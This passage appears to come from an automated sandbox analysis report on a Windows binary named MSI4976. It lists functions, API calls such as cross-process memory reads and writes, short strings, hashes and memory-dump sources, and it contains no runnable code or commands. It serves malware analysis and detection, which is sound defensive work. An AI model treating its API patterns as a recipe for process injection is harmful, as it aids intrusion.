                                        • Instruction ID: 9abdebc396879f0919e7d9300dfb3d096a83c2f688bec80ba2d60fe09a261585
                                        • Opcode Fuzzy Hash: a5c0f37a31ce135fecd524a216c6dda073d3ee9b2541ec6852775496379e417f
                                        • Instruction Fuzzy Hash: F621E4323503046BEF239E54DC82FFE3369EB54750F25451AF951AB1D0C6B1AC818B60
                                        Function 0035C98D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0035C9A6
                                          • Part of subcall function 00364C65: GetWindowThreadProcessId.USER32(?,?), ref: 00364C90
                                          • Part of subcall function 00364C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0035C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00364CA0
                                          • Part of subcall function 00364C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0035C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00364CB6
                                          • Part of subcall function 00364D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035C9FE,?,?,00000034,00000800,?,00000034), ref: 00364D6B
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0035CA0D
                                          • Part of subcall function 00364D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00364D36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @U=u
                                        • API String ID: 1045663743-2594219639
                                        • Opcode ID: ba770c425f2fc4fd8cd7c19a2294a51d9f9ff7b31ce73fe57a5401398c2d86ba
                                        • Instruction ID: 629b8e4dc2d94d7c6e4c9c7a961ce20fa1aa4dae667803870662b34a093c6ed1
                                        • Opcode Fuzzy Hash: ba770c425f2fc4fd8cd7c19a2294a51d9f9ff7b31ce73fe57a5401398c2d86ba
                                        • Instruction Fuzzy Hash: 72217131D01228AFDF22DFA4DC85FDDBBB8FF05754F1081A5E945AB1A1EA705A44CB90
                                        Function 003891DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00389269
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00389274
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: c66ed4602f86b0a88a2fcc66312c1db7aaa2c26ea85a4f9a92fa51ea6677bccc
                                        • Instruction ID: 208433578521c8bea975dd292d34289d0c20aa48c51cc39d803d10b533fd872d
                                        • Opcode Fuzzy Hash: c66ed4602f86b0a88a2fcc66312c1db7aaa2c26ea85a4f9a92fa51ea6677bccc
                                        • Instruction Fuzzy Hash: EC11B67130020CBFEF129E54DC81FBB376EEB893A4F154566F9189B290D631DC5187A0
                                        Function 0038C1EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @U=u
                                        • API String ID: 0-2594219639
                                        • Opcode ID: 1660ef247541927ccf7141b7278fa3d02c7c5f3f0f606f62ad6112cb8b27a536
                                        • Instruction ID: de16be726e5d353980a3e668faf4f0e4b1613149dd44ef52f35258e29098fb63
                                        • Opcode Fuzzy Hash: 1660ef247541927ccf7141b7278fa3d02c7c5f3f0f606f62ad6112cb8b27a536
                                        • Instruction Fuzzy Hash: 2211E231120308BFEF16AF98CC01FF937A8EB05750F115995FA16AA0D0D2B0DA10EB30
                                        Function 0038970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0033C657
                                          • Part of subcall function 0033C619: GetStockObject.GDI32(00000011), ref: 0033C66B
                                          • Part of subcall function 0033C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033C675
                                        • GetWindowRect.USER32(00000000,?), ref: 00389775
                                        • GetSysColor.USER32(00000012), ref: 0038978F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: 657cb95297d723c6d39445050981a67de60dc487904437bb69f7a0021ba1efb8
                                        • Instruction ID: 6ed1680a62fece25db4d4160893087e749ff74e00315c2a15a74d4cfd88957f3
                                        • Opcode Fuzzy Hash: 657cb95297d723c6d39445050981a67de60dc487904437bb69f7a0021ba1efb8
                                        • Instruction Fuzzy Hash: 5D116A72520209AFDB06EFB8DC45EFA7BB8EB49304F050569F956E3240D735E851DB50
                                        Function 0038AFEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,?,?,?), ref: 0038B03B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 8719e87d2d7cd01e28fc999b5c0396541ed2556a741d480aa2104ba61bc0e7df
                                        • Instruction ID: 781034fb6419cbccc3091567ceb9c4dd7e74bfd340bb8eb86a55e11a3ba52d60
                                        • Opcode Fuzzy Hash: 8719e87d2d7cd01e28fc999b5c0396541ed2556a741d480aa2104ba61bc0e7df
                                        • Instruction Fuzzy Hash: 6E21B3BA60021AEFCB1ADF94D840CEEBBB9FB4D340B014595FD16A7360D731A951DBA0
                                        Function 003753F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0037544C
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00375475
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: 94447d67ec85f4035f12163e9ab05ca6816763eaa14020965b6d0bcafd85dc1d
                                        • Instruction ID: eae6587e31b2d8decb80c7bc9ab1867c1d0259da6173f32197a534a9d4d0ff7d
                                        • Opcode Fuzzy Hash: 94447d67ec85f4035f12163e9ab05ca6816763eaa14020965b6d0bcafd85dc1d
                                        • Instruction Fuzzy Hash: AF11A370141A21BADB3A8F528C84EFBFB6CFF16752F10C12AF54956440E3B85980C6F0
                                        Function 003890BE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00389134
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u$button
                                        • API String ID: 3850602802-1762282863
                                        • Opcode ID: a57a69fd72a7fcc0769772cf0d5696cddd0fa5a896e8d4b2efdaf9fe50ded556
                                        • Instruction ID: bea248213e3dd3ef356c41f6c05dfd98b97238f79ea67245aee741ae46e20867
                                        • Opcode Fuzzy Hash: a57a69fd72a7fcc0769772cf0d5696cddd0fa5a896e8d4b2efdaf9fe50ded556
                                        • Instruction Fuzzy Hash: 4D112532250205ABDF129F60DC45FFA376AFF18314F154515FA85A7290C276E8609B50
                                        Function 0034B4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00354557
                                        • ___raise_securityfailure.LIBCMT ref: 0035463E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                        • String ID: (>
                                        • API String ID: 3761405300-3184569772
                                        • Opcode ID: b467787117b54bece7dc220d95e51280d360247ac8a1dff3472f6482fcb1bd2f
                                        • Instruction ID: 3863188577ac5639bbf0f65d578fceb427b1f15b0919ec1bbca02a45f2ade450
                                        • Opcode Fuzzy Hash: b467787117b54bece7dc220d95e51280d360247ac8a1dff3472f6482fcb1bd2f
                                        • Instruction Fuzzy Hash: 6721F6B55017849AD32ADF65FED16517BB8BB88314F105A2AE5048E2E0E3F469C0CB85
                                        Function 0038A395 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000133E,00000000,?), ref: 0038A3E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 3320c2ed87272f8dac591d0cba352f9891e3d0544a79657b5e40c8338b048fdc
                                        • Instruction ID: 9eb1231dea4ca106b1d7f20bc7eb14ebfb64e753130bc8a73f3da3ce778ac4c2
                                        • Opcode Fuzzy Hash: 3320c2ed87272f8dac591d0cba352f9891e3d0544a79657b5e40c8338b048fdc
                                        • Instruction Fuzzy Hash: 9A112230500B40AFEB22DF34C895AE7BBE9BF06300F10854EE8AB97381D7B06901DB61
                                        Function 0035CC25 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00364D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035C9FE,?,?,00000034,00000800,?,00000034), ref: 00364D6B
                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 0035CC85
                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 0035CCA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$MemoryProcessWrite
                                        • String ID: @U=u
                                        • API String ID: 1195347164-2594219639
                                        • Opcode ID: 0542bdeadbedc7ca6382a3521bc054796111a75b298956a907f6a74a8bcbb0c4
                                        • Instruction ID: de494c80c364094d5a64bd57a78fde145b4e4fdf5c4c10674d2beee90373c82a
                                        • Opcode Fuzzy Hash: 0542bdeadbedc7ca6382a3521bc054796111a75b298956a907f6a74a8bcbb0c4
                                        • Instruction Fuzzy Hash: 7C01FE71900214EFEB166F24EC86EEEBF7CDB14314F104126F9156B0D1DB705D55CA60
                                        Function 0037ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: htonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 3832099526-2422070025
                                        • Opcode ID: 459ac18f8c7098d024780bf6ab66fd2ac4cc504ce91cbbbc0cc61ed9eee8a3c9
                                        • Instruction ID: b1f6415bcf866f8977e239dd7765bd1d9431f72fd75f0ba89650bc9b73fa66bb
                                        • Opcode Fuzzy Hash: 459ac18f8c7098d024780bf6ab66fd2ac4cc504ce91cbbbc0cc61ed9eee8a3c9
                                        • Instruction Fuzzy Hash: FD014535200204ABCB329FA4CC56FADB368FF88720F10C416F91A9B6D1D735E800C752
                                        Function 0036C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __fread_nolock_memmove
                                        • String ID: EA06
                                        • API String ID: 1988441806-3962188686
                                        • Opcode ID: b9194e117a1858e48260c8ccd4c10b6e110f8b841eb3b91a0f923b39adc0a6ac
                                        • Instruction ID: ba7fd5cd837732f71e4d92c4bede4d9f40416578abcc72d856812a84bf780e22
                                        • Opcode Fuzzy Hash: b9194e117a1858e48260c8ccd4c10b6e110f8b841eb3b91a0f923b39adc0a6ac
                                        • Instruction Fuzzy Hash: 3501F9729002586EDF19D799CC56FFE7BF89B05311F00415AE193D6181E574A7088B60
                                        Function 0035CD4F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 0035CD75
                                        • SendMessageW.USER32(?,0000040D,?,00000000), ref: 0035CDA8
                                          • Part of subcall function 00364D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00364D36
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$MemoryProcessRead_memmove
                                        • String ID: @U=u
                                        • API String ID: 339422723-2594219639
                                        • Opcode ID: 9fc658233bbfe312f0b399d959bd2f0a95dc68991c547184248eb6e8773efa90
                                        • Instruction ID: bbd584878e11b825fc8d0225c1c2591f59174f8ad8b1b78e45def1ef77622fc3
                                        • Opcode Fuzzy Hash: 9fc658233bbfe312f0b399d959bd2f0a95dc68991c547184248eb6e8773efa90
                                        • Instruction Fuzzy Hash: ED012D71800128EFDB56AF54DC91EDA7BBCFB14344F50C0A5F94AAB151DE305E89CBA0
                                        Function 0035CCB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0035CCC6
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0035CCDE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 336a1bdca20676d2c107fe716d99d81b1f243d0eeb4f2b2d6622e10bdaa6e873
                                        • Instruction ID: 0e3c12487f2d3a47b1f898b09abeb253233f6861d83f972c1baa7544d73565f2
                                        • Opcode Fuzzy Hash: 336a1bdca20676d2c107fe716d99d81b1f243d0eeb4f2b2d6622e10bdaa6e873
                                        • Instruction Fuzzy Hash: BEE022313A13227EF2321A118D4AFC72E0DCB89B16F121025FF0AAE0F5CED24C4782A0
                                        Function 0035D451 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0035D463
                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 0035D493
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 3954ffb072e9391a558d0ac30298837edaacebe9715bd13432a72223165cdeb7
                                        • Instruction ID: 8dfcf6a99e77008e05b5771bb73a319d8f50a39f8329d90a9c57f54c030d4ce1
